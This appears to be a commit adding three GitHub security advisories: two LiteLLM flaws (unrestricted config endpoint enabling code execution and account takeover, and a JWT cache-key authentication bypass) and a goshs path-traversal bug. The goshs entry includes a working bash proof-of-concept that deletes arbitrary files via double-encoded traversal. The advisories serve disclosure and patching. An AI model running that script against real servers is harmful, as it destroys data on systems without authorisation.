Publish Advisories

GHSA-53mr-6c8q-9789
GHSA-6qcc-6q27-whp8
GHSA-jjhc-v7c2-5hh6

Author: advisory-database[bot]

advisories/github-reviewed/2026/04/GHSA-53mr-6c8q-9789/GHSA-53mr-6c8q-9789.json

@@ -0,0 +1,57 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-53mr-6c8q-9789",
+  "modified": "2026-04-03T21:59:31Z",
+  "published": "2026-04-03T21:59:31Z",
+  "aliases": [
+    "CVE-2026-35029"
+  ],
+  "summary": "LiteLLM: Privilege escalation via unrestricted proxy configuration endpoint",
+  "details": "### Impact\n\nThe `/config/update endpoint` does not enforce admin role authorization. A user who is already authenticated into the platform can then use this endpoint to do the following:\n\n  - Modify proxy configuration and environment variables\n  - Register custom pass-through endpoint handlers pointing to attacker-controlled Python code, achieving remote code execution\n  - Read arbitrary server files by setting UI_LOGO_PATH and fetching via /get_image\n  - Take over other priveleged accounts by overwriting UI_USERNAME and UI_PASSWORD environment variables\n\n### Patches\n\nFixed in v1.83.0. The endpoint now requires `proxy_admin` role.\n\n### Workarounds\n\nRestrict API key distribution. There is no configuration-level workaround.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "litellm"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.83.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/BerriAI/litellm/security/advisories/GHSA-53mr-6c8q-9789"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/BerriAI/litellm"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-863"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-03T21:59:31Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-6qcc-6q27-whp8/GHSA-6qcc-6q27-whp8.json

@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-6qcc-6q27-whp8",
+  "modified": "2026-04-03T21:58:48Z",
+  "published": "2026-04-03T21:58:47Z",
+  "aliases": [
+    "CVE-2026-35471"
+  ],
+  "summary": "goshs: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)",
+  "details": "### Summary\n* `deleteFile()` missing return after path traversal check | `httpserver/handler.go:645-671`\n\nThe finding affects the default configuration, no flags or authentication required.\n\n### Details\n\n**File:** `httpserver/handler.go:645-671`\n**Trigger:** `GET /<path>?delete` (handler.go:157-160 dispatches to `deleteFile`)\n\nThe function detects `..` in the decoded path but does not `return`.\n\n```go\nfunc (fs *FileServer) deleteFile(w http.ResponseWriter, req *http.Request) {\n    upath := filepath.FromSlash(filepath.Clean(\"/\" + strings.Trim(req.URL.Path, \"/\")))\n\n    fileCleaned, _ := url.QueryUnescape(upath)\n    if strings.Contains(fileCleaned, \"..\") {\n        w.WriteHeader(500)\n        _, err := w.Write([]byte(\"Cannot delete file\"))\n        if err != nil {\n            logger.Errorf(\"error writing answer to client: %+v\", err)\n        }\n        // BUG: no return, falls through to os.RemoveAll\n    }\n\n    deletePath := filepath.Join(fs.Webroot, fileCleaned)\n    err := os.RemoveAll(deletePath)  // always executes\n```\n\n**Root causes:**\nMissing `return` after the guard makes the check dead code\n\n**Impact:** Unauthenticated arbitrary file/directory deletion.\n\n**PoCs:**\n```bash\n#!/usr/bin/env bash\n# Delete an arbitrary file/directory on a running goshs instance.\n# Usage: ./arbitrary_delete.sh <host> <port> <absolute-path-to-delete>\n\nset -euo pipefail\n\nHOST=\"${1:?Usage: $0 <host> <port> <absolute-path-to-delete>}\"\nPORT=\"${2:?Usage: $0 <host> <port> <absolute-path-to-delete>}\"\nTARGET=\"${3:?Usage: $0 <host> <port> <absolute-path-to-delete>}\"\n\n# Double-encode \"..\" => %252e%252e\n# We don't know the webroot depth, so use 16 levels (covers most paths).\nTRAVERSAL=\"\"\nfor _ in $(seq 1 16); do\n    TRAVERSAL=\"${TRAVERSAL}%252e%252e/\"\ndone\n\n# Strip leading / from target and URL-encode any special chars\nTARGET_REL=\"${TARGET#/}\"\nENCODED_TARGET=$(python3 -c \"import urllib.parse; print(urllib.parse.quote('$TARGET_REL', safe='/'))\")\n\nURL=\"http://${HOST}:${PORT}/${TRAVERSAL}${ENCODED_TARGET}?delete\"\n\necho \"[*] Target:  ${TARGET}\"\necho \"[*] Request: GET ${URL}\"\necho \"\"\n\nHTTP_CODE=$(curl -s -o /dev/null -w \"%{http_code}\" \"$URL\")\n\necho \"[*] HTTP ${HTTP_CODE}\"\n```\n\nTo execute it: `./arbitrary_delete.sh 10.1.2.2 8000 /tmp/canary`\n\n---\n\n## Recommendations\n\nChecking that the targeted file is part of the webroot could prevent these attacks. Also, ensure that the method `return` is called after every error response.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/patrickhener/goshs"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.1.5-0.20260401172448-237f3af891a9"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-6qcc-6q27-whp8"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/patrickhener/goshs/commit/237f3af891a90df9b903b85f1cd3438040ca261a"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/patrickhener/goshs"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-03T21:58:47Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-jjhc-v7c2-5hh6/GHSA-jjhc-v7c2-5hh6.json

@@ -0,0 +1,57 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-jjhc-v7c2-5hh6",
+  "modified": "2026-04-03T21:59:50Z",
+  "published": "2026-04-03T21:59:50Z",
+  "aliases": [
+    "CVE-2026-35030"
+  ],
+  "summary": "LiteLLM: Authentication bypass via OIDC userinfo cache key collision",
+  "details": "###  Impact\n\nWhen JWT authentication is enabled (`enable_jwt_auth: true`), the OIDC userinfo cache uses `token[:20]` as the cache key. JWT headers produced by the same signing algorithm generate identical first 20 characters.\n\nThis configuration option is not enabled by default. **Most instances are not affected.**\n\nAn unauthenticated attacker can craft a token whose first 20 characters match a legitimate user's cached token. On cache hit, the attacker inherits the legitimate user's identity and permissions. This affects deployments with JWT/OIDC authentication enabled.\n\n###  Patches\n\nFixed in v1.83.0. The cache key now uses the full hash of the JWT token.\n\n###  Workarounds\n\nDisable OIDC userinfo caching by setting the cache TTL to 0, or disable JWT authentication entirely.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "litellm"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.83.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/BerriAI/litellm/security/advisories/GHSA-jjhc-v7c2-5hh6"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/BerriAI/litellm"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-287"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-03T21:59:50Z",
+    "nvd_published_at": null
+  }
+}